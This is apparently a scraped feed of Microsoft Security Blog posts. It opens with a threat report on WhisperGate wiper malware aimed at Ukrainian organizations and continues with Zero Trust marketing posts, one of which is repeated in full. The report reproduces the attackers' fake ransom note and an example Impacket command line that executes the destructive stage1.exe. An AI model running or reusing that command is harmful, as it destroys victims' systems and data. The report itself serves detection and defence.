Destructive malware targeting Ukrainian organizations

Microsoft Threat Intelligence Center (MSTIC) has identified evidence of a destructive malware operation targeting multiple organizations in Ukraine. This malware first appeared on victim systems in Ukraine on January 13, 2022. Microsoft is aware of the ongoing geopolitical events in Ukraine and surrounding region and encourages organizations to use the information in this post to proactively protect from any malicious activity.

While our investigation is continuing, MSTIC has not found any notable associations between this observed activity, tracked as DEV-0586, and other known activity groups. MSTIC assesses that the malware, which is designed to look like ransomware but lacking a ransom recovery mechanism, is intended to be destructive and designed to render targeted devices inoperable rather than to obtain a ransom.

At present and based on Microsoft visibility, our investigation teams have identified the malware on dozens of impacted systems and that number could grow as our investigation continues. These systems span multiple government, non-profit, and information technology organizations, all based in Ukraine. We do not know the current stage of this attacker’s operational cycle or how many other victim organizations may exist in Ukraine or other geographic locations. However, it is unlikely these impacted systems represent the full scope of impact as other organizations are reporting.

Given the scale of the observed intrusions, MSTIC is not able to assess intent of the identified destructive actions but does believe these actions represent an elevated risk to any government agency, non-profit or enterprise located or with systems in Ukraine. We strongly encourage all organizations to immediately conduct a thorough investigation and to implement defenses using the information provided in this post. MSTIC will update this blog as we have additional information to share.

As with any observed nation-state actor activity, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with the information they need to guide their investigations. MSTIC is also actively working with members of the global security community and other strategic partners to share information that can address this evolving threat through multiple channels. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor or merged with existing actors.

Observed actor activity

On January 13, Microsoft identified intrusion activity originating from Ukraine that appeared to be possible Master Boot Records (MBR) Wiper activity. During our investigation, we found a unique malware capability being used in intrusion attacks against multiple victim organizations in Ukraine.

Stage 1: Overwrite Master Boot Record to display a faked ransom note

The malware resides in various working directories, including C:\PerfLogs, C:\ProgramData, C:\, and C:\temp, and is often named stage1.exe. In the observed intrusions, the malware executes via Impacket, a publicly available capability often used by threat actors for lateral movement and execution.

The two-stage malware overwrites the Master Boot Record (MBR) on victim systems with a ransom note (Stage 1). The MBR is the part of a hard drive that tells the computer how to load its operating system. The ransom note contains a Bitcoin wallet and Tox ID (a unique account identifier used in the Tox encrypted messaging protocol) that have not been previously observed by MSTIC:

Your hard drive has been corrupted.
In case you want to recover all hard drives
of your organization,
You should pay us $10k via bitcoin wallet
1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via
tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65
with your organization name.
We will contact you to give further instructions.

The malware executes when the associated device is powered down, an action that is often an initial response to ransomware attacks.

Overwriting the MBR is atypical for cybercriminal ransomware. In reality, the ransomware note is a ruse and that the malware destructs MBR and the contents of the files it targets. There are several reasons why this activity is inconsistent with cybercriminal ransomware activity observed by MSTIC, including:

  • Ransomware payloads are typically customized per victim. In this case, the same ransom payload was observed at multiple victims.
  • Virtually all ransomware encrypts the contents of files on the filesystem. The malware in this case overwrites the MBR with no mechanism for recovery. 
  • Explicit payment amounts and cryptocurrency wallet addresses are rarely specified in modern criminal ransom notes, but were specified by DEV-0586. The same Bitcoin wallet address has been observed across all DEV-0586 intrusions and at the time of analysis, the only activity was a small transfer on January 14.
  • It is rare for the communication method to be only a Tox ID, an identifier for use with the Tox encrypted messaging protocol. Typically, there are websites with support forums or multiple methods of contact (including email) to make it easy for the victim to successfully make contact.
  • Most criminal ransom notes include a custom ID that a victim is instructed to send in their communications to the attackers. This is an important part of the process where the custom ID maps on the backend of the ransomware operation to a victim-specific decryption key. The ransom note in this case does not include a custom ID.

Microsoft will continue to monitor DEV-0586 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.

Stage 2: File corrupter malware

Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions:

.3DM .3DS .7Z .ACCDB .AI .ARC .ASC .ASM .ASP .ASPX .BACKUP .BAK .BAT .BMP .BRD .BZ .BZ2 .CGM .CLASS .CMD .CONFIG .CPP .CRT .CS .CSR .CSV .DB .DBF .DCH .DER .DIF .DIP .DJVU.SH .DOC .DOCB .DOCM .DOCX .DOT .DOTM .DOTX .DWG .EDB .EML .FRM .GIF .GO .GZ .HDD .HTM .HTML .HWP .IBD .INC .INI .ISO .JAR .JAVA .JPEG .JPG .JS .JSP .KDBX .KEY .LAY .LAY6 .LDF .LOG .MAX .MDB .MDF .MML .MSG .MYD .MYI .NEF .NVRAM .ODB .ODG .ODP .ODS .ODT .OGG .ONETOC2 .OST .OTG .OTP .OTS .OTT .P12 .PAQ .PAS .PDF .PEM .PFX .PHP .PHP3 .PHP4 .PHP5 .PHP6 .PHP7 .PHPS .PHTML .PL .PNG .POT .POTM .POTX .PPAM .PPK .PPS .PPSM .PPSX .PPT .PPTM .PPTX .PS1 .PSD .PST .PY .RAR .RAW .RB .RTF .SAV .SCH .SHTML .SLDM .SLDX .SLK .SLN .SNT .SQ3 .SQL .SQLITE3 .SQLITEDB .STC .STD .STI .STW .SUO .SVG .SXC .SXD .SXI .SXM .SXW .TAR .TBK .TGZ .TIF .TIFF .TXT .UOP .UOT .VB .VBS .VCD .VDI .VHD .VMDK .VMEM .VMSD .VMSN .VMSS .VMTM .VMTX .VMX .VMXF .VSD .VSDX .VSWP .WAR .WB2 .WK1 .WKS .XHTML .XLC .XLM .XLS .XLSB .XLSM .XLSX .XLT .XLTM .XLTX .XLW .YML .ZIP

If a file carries one of the extensions above, the corrupter overwrites the contents of the file with a fixed number of 0xCC bytes (total file size of 1MB). After overwriting the contents, the destructor renames each file with a seemingly random four-byte extension. Analysis of this malware is ongoing.

Recommended customer actions

MSTIC and the Microsoft security teams are working to create and implement detections for this activity. To date, Microsoft has implemented protections to detect this malware family as WhisperGate (e.g., DoS:Win32/WhisperGate.A!dha) via Microsoft Defender Antivirus and Microsoft Defender for Endpoint, wherever these are deployed on-premises and cloud environments. We are continuing the investigation and will share significant updates with affected customers, as well as public and private sector partners, as get more information. The techniques used by the actor and described in the this post can be mitigated by adopting the security considerations provided below:

  • Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
  • Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.
  • Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity.  NOTE: Microsoft strongly encourages all customers download and use password-less solutions like Microsoft Authenticator to secure accounts.
  • Enable Controlled folder Access (CFA) in Microsoft Defender for Endpoint to prevent MBR/VBR modification.

Indicators of compromise (IOCs)

The following list provides IOCs observed during our investigation. We encourage customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.

Indicator Type Description
a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 SHA-256 Hash of destructive malware stage1.exe
dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 SHA-256 Hash of stage2.exe
cmd.exe /Q /c start c:\stage1.exe 1> \\127.0.0.1\ADMIN$\__[TIMESTAMP] 2>&1 Command line Example Impacket command line showing the execution of the destructive malware. The working directory has varied in observed intrusions.

NOTE: These indicators should not be considered exhaustive for this observed activity.

Detections

Microsoft 365 Defender

Antivirus

The post Destructive malware targeting Ukrainian organizations appeared first on Microsoft Security Blog.

Security baseline for Microsoft Edge v97

January 14th, 2022 No comments

We are pleased to announce the enterprise-ready release of the security baseline for Microsoft Edge version 97!


 


We have reviewed the settings in Microsoft Edge version 97 and updated our guidance with the addition of 1 setting. A new Microsoft Edge security baseline package was just released to the Download Center. You can download the version 97 package from the Security Compliance Toolkit.


 


Enhance Images


In version 97 we added a setting “Enhance images enabled” that the baseline recommends disabling for Enterprises.  This feature sends images from web applications to Microsoft for enhancement (e.g. better color, lighting, and contrast).  For additional information on this setting please see this link


 


Microsoft Edge version 97 introduced 15 new computer settings and 15 new user settings. We have included a spreadsheet listing the new settings in the release to make it easier for you to find them.


 


As a friendly reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.


 


Please continue to give us feedback through the Security Baseline Community or this post.

Categories: Uncategorized Tags:

Learn about 4 approaches to comprehensive security that help leaders be fearless

January 13th, 2022 No comments

The last 18 months have put unprecedented pressure on organizations to speed up their digital transformation as remote and hybrid work continue to become the new normal. Yet even with all the change and uncertainty, having the right security support system in place means your organization can still move forward confidently to turn your vision into reality. I’ve seen our customers demonstrate this fearlessness every day, and I love learning from them as we stand together against ongoing threats.

According to the Microsoft Zero Trust Adoption report,1 security is the top concern for organizations moving to hybrid work, and it’s the number one reason that security professionals are adopting a Zero Trust approach. According to the report, only 31 percent of organizations that reported being ahead with their Zero Trust implementation were impacted by NOBELIUM, the perpetrators of the SolarWinds attack.2 Compare that to the 75 percent negatively affected by this devastating cyberattack that reported lagging behind in their Zero Trust implementation.

Zero Trust Adoption Report bar chart showcasing the varying levels of Zero Trust adoption across Microsoft Exchange, Zoom Credentials, SolarWinds, Robinhood, Intel, and Fireye.

Figure 1: Negative impacts of cyberattacks in relation to Zero Trust implementation.

Knowing that your organization is protected from such threats, both external and internal, helps build the confidence you need to succeed. Zero Trust is a strategy that will help you get there. At Microsoft Security, we’re embracing the new reality of hybrid work by providing comprehensive security with best-in-breed coverage—driven by AI and simplified for easy management—so you can be fearless in the pursuit of your vision. In this blog, I’ll share some of our customers’ stories and how they’ve empowered their teams to move forward with confidence during this time of unprecedented change.

1. Comprehensive means coverage of your entire environment

Microsoft unifies security, compliance, identity, and management to help you improve productivity and protect your entire digital estate. By providing an end-to-end solution, we’re able to integrate layers of protection across multiple clouds, platforms, endpoints, and devices—Windows, macOS, Linux, iOS, Android, Amazon Web Services (AWS), Workday, Salesforce, and more. This comprehensive approach reduces the risk of data breaches as well as compliance and privacy missteps. Once the user sets the polices, Microsoft solutions provide data governance that can help enact better security.

Flow chart showcasing identities and endpoints as their authentication and compliance requests are intercepted by the Zero Trust Policy for verification before being granted access to Networks and the data/apps/infrastructure they’re composed of.

Figure 2: Microsoft Zero Trust architecture.

More than providing products and services, we collaborate with our customers to understand their environments and build solutions that fit their needs. One such collaboration was with Siemens where they moved from traditional on-premises security to a scalable, flexible solution to fit the company’s complex environment. Having built its reputation for innovation across diverse industries—energy, healthcare, industrial automation, building control systems, and more—research and development continues to play a vital role in the company’s success. For that reason, protecting the company’s staff and intellectual property is always top of mind. And with offices in 200 countries, managing cybersecurity amid a global landscape of shifting compliance and security regulations provides an ongoing challenge.

“There aren’t many vendors on the planet that can create a solution capable of providing consolidated insights into large, complex environments like ours. That’s why we chose Microsoft.”—Thomas Mueller-Lynch, Service Owner Lead, Digital Identity, Siemens.

“The sheer size of Siemens challenges us as to how we provide the best possible security,” explained Peter Stoll, Cybersecurity Officer and Program Lead for Zero Trust at Siemens IT Worldwide. “We like to make sure we get the benefits of emerging technologies.”

When Siemens decided to make the move from on-premises security to a Zero Trust approach, it turned to Microsoft Security. Their IT team implemented a range of security solutions through their Microsoft 365 subscriptions, including Microsoft Azure Active Directory (Azure AD) with Conditional Access as a policy engine, Microsoft Information Protection, Microsoft Defender for Endpoint, Microsoft Defender for Identity, and other solutions—creating a blueprint for ongoing security enhancements. “We chose the best of suite approach with the Microsoft 365 E5 solution,” explained Mueller-Lynch. “Now we have an overview of our environment that helps us react in real-time and defend against attacks proactively.”

2. Comprehensive isn’t just coverage—it’s best-in-breed protection

Today’s organization not only requires security coverage across their threat landscape but also the confidence that comes with knowing that your provider has a proven track record. Microsoft is a leader in five Gartner Magic Quadrants and eight Forrester Wave categories, and we ranked the highest in the MITRE Engenuity® ATT&CK Evaluations. Microsoft was also named a Leader in IDC MarketScape for Modern Endpoint Security. With best-in-breed protection across the Zero Trust security fundamentals shown in Figure 2, Microsoft provides a security safety net that’s not only comprehensive and fully integrated, but durable for the future. Microsoft’s comprehensive solution has innovation at its heart.

Duck Creek Technologies serves the global property and casualty insurance industry by providing cloud-based, software as a service (SaaS) solutions that help insurance carriers operate faster and smarter. When the company’s existing security information and event manager (SIEM) neared the limits of its processing capabilities, Duck Creek needed to upgrade without losing critical data or reducing its ability to detect threats. “Security is a very big part of how we’ve created the relationships we have with our illustrious list of customers,” says John Germain, Vice President and Chief Information Security Officer, Duck Creek Technologies. “I wanted to be sure that the solution we shifted to was best-in-class. Because Microsoft steadily improves its products and solutions to stay ahead of competing offerings, I know we’re in good hands.”

Duck Creek made a quick and painless migration to both Microsoft Defender for Cloud and Microsoft Sentinel. The company also uses Microsoft Endpoint Manager to manage its mobile-device security policies. Combining this functionality, Duck Creek has created single-pane-of-glass visibility for its remote workforce. “We now have incredible visibility across our entire technology stack, all in one place,” says Germain.

3. Integration and AI power Zero Trust security

Like Siemens, shifting from on-premises security to a multi-layered Zero Trust approach required the investment platform company eToro to reassess its infrastructure. As a social investing platform with more than 17 million registered users across more than 100 countries, their IT team has a lot to cover. “When we were operating our traditional third-party antivirus in parallel with our Microsoft solutions, we noticed that Microsoft Defender for Endpoint was acting as our first barrier against attackers. And in 99 percent of incidents, it was the first to detect and act on threats,” says Shay Zakai, Director of Corporate IT, eToro.

That level of protection gave eToro the confidence to remove its third-party antivirus software and rely on Microsoft’s comprehensive, integrated layers for Zero Trust security. That native integration enables Microsoft’s intelligent tools to cut alert volume by 90 percent while automatically remediating up to 97 percent of endpoint attacks. Today, eToro makes ample use of multiple components within Microsoft Defender for Endpoint—threat and vulnerability management, attack surface reduction, endpoint detection and response (EDR), and automatic investigation and remediation—to protect their global operations.

“Microsoft Cloud App Security [Microsoft Defender for Cloud Apps] gives us the ability to analyze and classify information from Google Workspace and our other third-party apps in conjunction with Microsoft’s compliance tools,” Zakai explains. “That level of information gives us the power to restrict activities and enforce regulations as we see fit.”

eToro also integrates Microsoft Intune, a component of Microsoft Endpoint Manager, for their mobile device and mobile application management. By adopting Microsoft’s integrated, AI-driven security, eToro not only automated threat detection and remediation but also increased mobility for employees while reducing their operating costs. “Because of our adoption of Intune and Microsoft Defender for Endpoint, we had virtually no security concerns as we adapted to COVID-19,” says Zakai. “We were more than 90 percent ready to move to a work-from-home model on day one of the crisis.”

4. Simplicity is stronger

Most security professionals agree that security silos bring risks.3 Microsoft enables organizations to simplify and strengthen their security by consolidating up to 50 disparate products—integrating with other tools to streamline investigation and remediation. When MVP Healthcare decided to divest from the numerous redundant security licenses they’d been relying on, it turned to Microsoft Security for a simpler, more easily managed security posture. The company was using roughly 300 different vendor solutions, many of them designed for specialized functions, and Chief Information Officer (CIO) Michael Della Villa wanted to simplify.

After replacing their legacy security solutions with Microsoft Sentinel, Microsoft Defender for Cloud, Azure Firewall, and other Microsoft security solutions, MVP Healthcare’s IT team was freed up to concentrate on crucial tasks that require human attention. “Microsoft offers the cohesive solution we need,” Della Villa says. “We spent so much time trying to maintain the prior system that we weren’t actually using it. Now we easily get very detailed information from Microsoft Sentinel because it’s so well connected across all of our Microsoft solutions. The focus and clarity we’ve gained is a crucial benefit.”

MVP Healthcare also uses Microsoft Defender for Cloud to protect hybrid workloads. “Alerts from Microsoft Defender for Cloud, Microsoft Defender for Cloud Apps, and other solutions are chained together in an actionable way,” adds MVP Healthcare cybersecurity consultant James Greene. “The entire security suite is seamlessly connected. We appreciate that because we can build a comprehensive policy for dealing with security issues in one place.”

As a global leader in technology manufacturing for IoT systems, machine automation, and embedded computing, Advantech found itself the target of a widely publicized ransomware attack in November 2020. The attack was limited to corporate network servers and was quickly mitigated, but it served as a wakeup call. Future threats could affect factory production, delay customer deliveries, lead to theft of sensitive intellectual property, and even result in safety risks.

“We did many proof of concepts (POCs) with many different vendors, but no one met our needs,” says Kevin Lin, IT Manager at Advantech. “We wanted a comprehensive solution to create better efficiency and visibility. We needed security without affecting efficiency on the client side, or requiring specialist installation and configuration by administrators. We decided on Microsoft.”

According to Kevin, Microsoft Security offers a distinct advantage in its holistic approach to services and security. “Other solutions were a little siloed, specialized, and required individual testing—both for the product and support,” he says. “Many didn’t adequately address operational technology (OT) requirements for manufacturing plants, and we recognized that Advantech’s environment called for a comprehensive solution like Microsoft Security, not a collection of solutions.”

Advantech’s security team is now looking to further raise visibility into their IoT and OT risk with agentless, network-layer security provided by Microsoft Defender for IoT—including asset discovery, vulnerability management, and continuous threat monitoring with anomaly detection. “We didn’t have staff dedicated to figuring out our security situation in our manufacturing plants (where IT security isn’t their specialty),” Kevin says. “This attack alerted senior management that they needed to deploy OT security monitoring in our factory networks as well.”

Helping you be fearless

Across the world with organizations of all sizes, from startups to multinational corporations, we see security teams behind the scenes quietly being fearless in achieving their goals. Despite the threats they face daily, these unsung leaders bravely continue the journey of helping their organizations digitally transform. They and you are the reason we want to show up for this important work. By providing not just comprehensive security, but best-in-breed protection with deep intelligence and simplified experiences—Microsoft Security is right there beside you. We want to help you secure everything and be fearless, and turn your vision into reality. To hear from our customers in their own words, visit Customer Stories to learn more. We look forward to our journey together, being fearless, and empowering each other to thrive!

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


1Zero Trust Adoption Report, Microsoft Security, Hypothesis Group 2021. July 2021.

2The hunt for NOBELIUM, the most sophisticated nation-state attack in history, John Lambert, Microsoft Security. 10 November 2021.

3Why Security Can’t Live In A Silo, Douglas Albert, Forbes Technology Council, Forbes. 5 October 2020.

The post Learn about 4 approaches to comprehensive security that help leaders be fearless appeared first on Microsoft Security Blog.

Categories: cybersecurity, Zero Trust Tags:

Microsoft Zero Trust solutions deliver 92 percent return on investment, says new Forrester study

January 12th, 2022 No comments

In the last two years, we’ve seen a staggering increase in the adoption of cloud-based services, remote work solutions, bring your own device (BYOD), and IoT devices as organizations digitally transform themselves to enable a hybrid workforce.1 Zero Trust has become the essential security strategy for successfully preventing data breaches and mitigating risk in today’s complex cybersecurity landscape.

Implementing a Zero Trust security strategy, however, is a significant undertaking that requires in-depth planning, cross-company collaboration, and resources. Organizations need solutions that simplify and accelerate the adoption of Zero Trust by offering flexibility, integration, and a meaningful return on investment.

In the commissioned study The Total Economic ImpactTM of Zero Trust solutions from Microsoft, Forrester Consulting reports that adoption of Microsoft solutions to implement a Zero Trust security strategy delivers:

  • A three-year 92 percent return on investment (ROI) with a payback period of fewer than six months.  
  • A 50 percent lower chance of a data breach
  • Numerous efficiency gains of 50 percent or higher across security processes.
Total Economic Impact of implementing Zero Trust with Microsoft shows 92 percent R O I and $11.6 million N P V.

To better understand the benefits, costs, and risks associated with this investment, Forrester Consulting interviewed eight decision-makers with experience using Microsoft Security solutions to implement a Zero Trust security strategy. These customers were able to improve their security posture, reduce costs, achieve greater business agility, and increase efficiency in managing security. 

Improved security posture 

Data breaches can be incredibly costly as organizations work to recover their environment and brand reputation. Forrester found that by adopting Microsoft security solutions for their Zero Trust strategy, organizations were able to reduce not only the risk of a breach but also the potential for regulatory violations. Customers also reported significant improvements in their security postures since beginning their journeys, a reduction of shadow IT, and increased compliance by meeting various regulatory requirements. 

Data breach risk reduced by half.

Enhanced security reduced the risk of a data breach by 50 percent. Improved authentication, network, and endpoint security protocols coupled with increased visibility into the network allowed organizations to better protect themselves from data breaches. And with network segmentation, financial losses were contained in the event of a breach.

“[Implementing strong authentication strategies has] allowed us to provide our employees with a better, more secure environment.”—Principal Architect, Logistics

Reduced cost 

A comprehensive adoption of Zero Trust involves a significant transformation of the entire security strategy—and with it, a restructuring of costs. By eliminating legacy systems and improving processes, organizations uncover significant cost savings opportunities across the entire cybersecurity organization.  

With Microsoft Security solutions, customers were able to simplify their security strategy and retire unnecessary legacy software and infrastructure, resulting in cost savings of over USD7 million. This eliminates redundant security solutions delivered on average a $20 per employee per month savings.

Calls placed to IT and help desk decreased by half.

Process efficiencies also led to cost savings. Calls placed to IT and help desk analysts decreased by 50 percent over a three-year period. The mean time to resolve (MTTR) per inquiry also decreased by 15 percent, leading to a total net present value (NPV) of USD1,773,095 over the three years. In addition, advanced audit and discovery capabilities in the Microsoft solution stack reduced the resources required for audit and compliance management by 25 percent, saving USD2 million NPV.

Greater business agility  

A simplified security architecture through Zero Trust improves business agility. Through efficient system management and user access, organizations can move quickly to pursue business opportunities, and support remote work while managing risk.

80 percent less effort required to secure new infrastructure.

Microsoft Security solutions reduced the effort required to provision and secure new infrastructure by 80 percent through automated provisioning of new systems, from SQL servers to virtual machines for new applications. The time required to provision new infrastructure went from several months to days. Meanwhile, workers improved their productivity through better access. Frontline workers gained efficient access to business-critical applications and systems of record, saving them an average of 30 minutes per week.  

With many of the Microsoft solutions that support Zero Trust available on a software as a service (SaaS) basis, organizations can quickly expand or contract their environment without needing to purchase additional hardware or dedicate resources to implement changes. 

“[Using Microsoft security solutions] has allowed us to focus more on our future as opposed to worrying about infrastructure.”—Identity Engineer, Manufacturing 

Efficient security management  

Most organizations dedicate too much time to triaging, investigating, and remediating alerts. A simplified Zero Trust security framework can reduce management time, both by cutting down the number of security incidents and by improving security response. 

Reduced management time by half due to improved security processes.

Customers that had implemented Microsoft’s Zero Trust security framework reported a 50 percent reduction in management time due to improved security processes. Security teams were able to provision and secure new infrastructure 80 percent more quickly and accelerate the process to set up users on new devices. They were able to more quickly remediate security issues using built-in automation in Microsoft solutions such as Microsoft Sentinel, Microsoft Azure Active Directory (Azure AD), and Microsoft 365 Defender.

“Azure AD has definitely allowed us to become more agile. We can make changes on a dime. Whereas, with our legacy system, product changes were far more cumbersome and painful. With our previous identity and access management (IAM) solution, we often had to write custom code and update our IAM solution across multiple data centers [and] then troubleshoot any problems. With Azure AD, everything is handled by Microsoft. This has allowed us to free up some of our resources and dedicate them to migrating our remaining applications to Azure AD.”—Principal Architect of Technical Services, Logistics Firm

Embrace proactive security with the Microsoft Zero Trust framework 

Zero Trust is the essential security strategy in today’s hybrid work environment. A complicated IT landscape of remote and group office users introduces more digital attack surfaces and risk, as perimeters are increasingly fluid. With security products and services that verify explicitly, grant least privileged access, and assume breaches, the Microsoft Zero Trust framework supports a proactive, integrated approach to security across all layers of the digital estate. We look forward to continuing to serve and protect our customers with a comprehensive Zero Trust strategy and solutions.

Learn more

  • Read our Zero Trust position paper for key insights, an example of a comprehensive security architecture, and a maturity model to help accelerate your adoption. 

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


1 New insights on cybersecurity in the age of hybrid work, Bret Arsenault, Microsoft Security, Microsoft. 27 October 2021.

The post Microsoft Zero Trust solutions deliver 92 percent return on investment, says new Forrester study appeared first on Microsoft Security Blog.

Categories: cybersecurity, Zero Trust Tags:

Microsoft Zero Trust solutions deliver 92 percent return on investment, says new Forrester study

January 12th, 2022 No comments

In the last two years, we’ve seen a staggering increase in the adoption of cloud-based services, remote work solutions, bring your own device (BYOD), and IoT devices as organizations digitally transform themselves to enable a hybrid workforce.1 Zero Trust has become the essential security strategy for successfully preventing data breaches and mitigating risk in today’s complex cybersecurity landscape.

Implementing a Zero Trust security strategy, however, is a significant undertaking that requires in-depth planning, cross-company collaboration, and resources. Organizations need solutions that simplify and accelerate the adoption of Zero Trust by offering flexibility, integration, and a meaningful return on investment.

In the commissioned study The Total Economic ImpactTM of Zero Trust solutions from Microsoft, Forrester Consulting reports that adoption of Microsoft solutions to implement a Zero Trust security strategy delivers:

  • A three-year 92 percent return on investment (ROI) with a payback period of fewer than six months.  
  • A 50 percent lower chance of a data breach
  • Numerous efficiency gains of 50 percent or higher across security processes.
Total Economic Impact of implementing Zero Trust with Microsoft shows 92 percent R O I and $11.6 million N P V.

To better understand the benefits, costs, and risks associated with this investment, Forrester Consulting interviewed eight decision-makers with experience using Microsoft Security solutions to implement a Zero Trust security strategy. These customers were able to improve their security posture, reduce costs, achieve greater business agility, and increase efficiency in managing security. 

Improved security posture 

Data breaches can be incredibly costly as organizations work to recover their environment and brand reputation. Forrester found that by adopting Microsoft security solutions for their Zero Trust strategy, organizations were able to reduce not only the risk of a breach but also the potential for regulatory violations. Customers also reported significant improvements in their security postures since beginning their journeys, a reduction of shadow IT, and increased compliance by meeting various regulatory requirements. 

Data breach risk reduced by half.

Enhanced security reduced the risk of a data breach by 50 percent. Improved authentication, network, and endpoint security protocols coupled with increased visibility into the network allowed organizations to better protect themselves from data breaches. And with network segmentation, financial losses were contained in the event of a breach.

“[Implementing strong authentication strategies has] allowed us to provide our employees with a better, more secure environment.”—Principal Architect, Logistics

Reduced cost 

A comprehensive adoption of Zero Trust involves a significant transformation of the entire security strategy—and with it, a restructuring of costs. By eliminating legacy systems and improving processes, organizations uncover significant cost savings opportunities across the entire cybersecurity organization.  

With Microsoft Security solutions, customers were able to simplify their security strategy and retire unnecessary legacy software and infrastructure, resulting in cost savings of over USD7 million. This eliminates redundant security solutions delivered on average a $20 per employee per month savings.

Calls placed to IT and help desk decreased by half.

Process efficiencies also led to cost savings. Calls placed to IT and help desk analysts decreased by 50 percent over a three-year period. The mean time to resolve (MTTR) per inquiry also decreased by 15 percent, leading to a total net present value (NPV) of USD1,773,095 over the three years. In addition, advanced audit and discovery capabilities in the Microsoft solution stack reduced the resources required for audit and compliance management by 25 percent, saving USD2 million NPV.

Greater business agility  

A simplified security architecture through Zero Trust improves business agility. Through efficient system management and user access, organizations can move quickly to pursue business opportunities, and support remote work while managing risk.

80 percent less effort required to secure new infrastructure.

Microsoft Security solutions reduced the effort required to provision and secure new infrastructure by 80 percent through automated provisioning of new systems, from SQL servers to virtual machines for new applications. The time required to provision new infrastructure went from several months to days. Meanwhile, workers improved their productivity through better access. Frontline workers gained efficient access to business-critical applications and systems of record, saving them an average of 30 minutes per week.  

With many of the Microsoft solutions that support Zero Trust available on a software as a service (SaaS) basis, organizations can quickly expand or contract their environment without needing to purchase additional hardware or dedicate resources to implement changes. 

“[Using Microsoft security solutions] has allowed us to focus more on our future as opposed to worrying about infrastructure.”—Identity Engineer, Manufacturing 

Efficient security management  

Most organizations dedicate too much time to triaging, investigating, and remediating alerts. A simplified Zero Trust security framework can reduce management time, both by cutting down the number of security incidents and by improving security response. 

Reduced management time by half due to improved security processes.

Customers that had implemented Microsoft’s Zero Trust security framework reported a 50 percent reduction in management time due to improved security processes. Security teams were able to provision and secure new infrastructure 80 percent more quickly and accelerate the process to set up users on new devices. They were able to more quickly remediate security issues using built-in automation in Microsoft solutions such as Microsoft Sentinel, Microsoft Azure Active Directory (Azure AD), and Microsoft 365 Defender.

“Azure AD has definitely allowed us to become more agile. We can make changes on a dime. Whereas, with our legacy system, product changes were far more cumbersome and painful. With our previous identity and access management (IAM) solution, we often had to write custom code and update our IAM solution across multiple data centers [and] then troubleshoot any problems. With Azure AD, everything is handled by Microsoft. This has allowed us to free up some of our resources and dedicate them to migrating our remaining applications to Azure AD.”—Principal Architect of Technical Services, Logistics Firm

Embrace proactive security with the Microsoft Zero Trust framework 

Zero Trust is the essential security strategy in today’s hybrid work environment. A complicated IT landscape of remote and group office users introduces more digital attack surfaces and risk, as perimeters are increasingly fluid. With security products and services that verify explicitly, grant least privileged access, and assume breaches, the Microsoft Zero Trust framework supports a proactive, integrated approach to security across all layers of the digital estate. We look forward to continuing to serve and protect our customers with a comprehensive Zero Trust strategy and solutions.

Learn more

  • Read our Zero Trust position paper for key insights, an example of a comprehensive security architecture, and a maturity model to help accelerate your adoption. 

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


1 New insights on cybersecurity in the age of hybrid work, Bret Arsenault, Microsoft Security, Microsoft. 27 October 2021.

The post Microsoft Zero Trust solutions deliver 92 percent return on investment, says new Forrester study appeared first on Microsoft Security Blog.

Categories: cybersecurity, Zero Trust Tags:

Coming Soon: New Security Update Guide Notification System

January 11th, 2022 No comments

Sharing information through the Security Update Guide is an important part of our ongoing effort to help customers manage security risks and keep systems protected. Based on your feedback we have been working to make signing up for and receiving Security Update Guide notifications easier. We are excited to share that starting today, you can …

Coming Soon: New Security Update Guide Notification System Read More »

Align your security and network teams to Zero Trust security demands

January 10th, 2022 No comments

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Security Product Marketing Manager Natalia Godyla talks with Jennifer Minella, Founder and Principal Advisor on Network Security at Viszen Security about strategies for aligning the security operations center (SOC) and network operations center (NOC) to meet the demands of Zero Trust and protect your enterprise.

Natalia: In your experience, why are there challenges bringing together networking and security teams?

Jennifer: Ultimately, it’s about trust. As someone who’s worked on complex network-based security projects, I’ve had plenty of experience sitting between those two teams. Often the security teams have an objective, which gets translated into specific technical mandates, or even a specific product. As in, we need to achieve X, Y, and Z level security; therefore, the networking team should just go make this product work. That causes friction because sometimes the networking team didn’t get a voice in that.

Sometimes it’s not even the right product or technology for what the actual goal was, but it’s too late at that point because the money is spent. Then it’s the networking team that looks bad when they don’t get it working right. It’s much better to bring people together to collaborate, instead of one team picking a solution.

Natalia: How does misalignment between the SOC and NOC impact the business?

